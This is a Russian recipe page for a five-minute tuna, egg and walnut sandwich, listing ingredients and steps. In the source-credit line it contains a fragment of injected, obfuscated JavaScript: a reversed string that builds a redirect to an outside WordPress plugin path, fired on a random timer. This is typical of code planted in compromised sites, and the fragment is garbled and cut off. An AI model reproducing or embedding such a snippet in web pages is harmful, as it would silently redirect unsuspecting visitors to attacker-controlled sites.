Артём Соколов советует рецепт низкокалорийных сэндвичей с тунцом и яйцом, которые содержат много белка и готовятся за считанные минуты. Идеальный вариант для тех, кто любит подольше поваляться в кровати.
Cэндвич с тунцом
Фото: seriouseats.com
Рецепт дня: сэндвич с тунцом
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
5 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4 порции
КАЛОРИЙНОСТЬ:
330 ккал
330 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Хлеб для тостов
4 куска
Консервированный тунец
200 г
Яйца
4 шт.
Салат латук
2 листа
Оливковое масло
2 ст. л.
Грецкие орехи
30 г
Петрушка
½ пучка
Чёрный перец
по вкусу
Соль
по вкусу
- Сварите яйца вкрутую.
- Тунец (нужен обязательно кусковой, измельчённый или в масле не подойдёт), яичные белки, два желтка и оливковое масло смешайте в блендере, чтобы получилась однородная масса.
- Добавьте измельчённые грецкие орехи, мелко нарезанную петрушку, соль и перец.
- Смажьте один кусок хлеба получившейся массой, сверху накройте листом салата и вторым куском хлеба. Разрежьте по диагонали.
- Сэндвичи готовы. Приятного аппетита!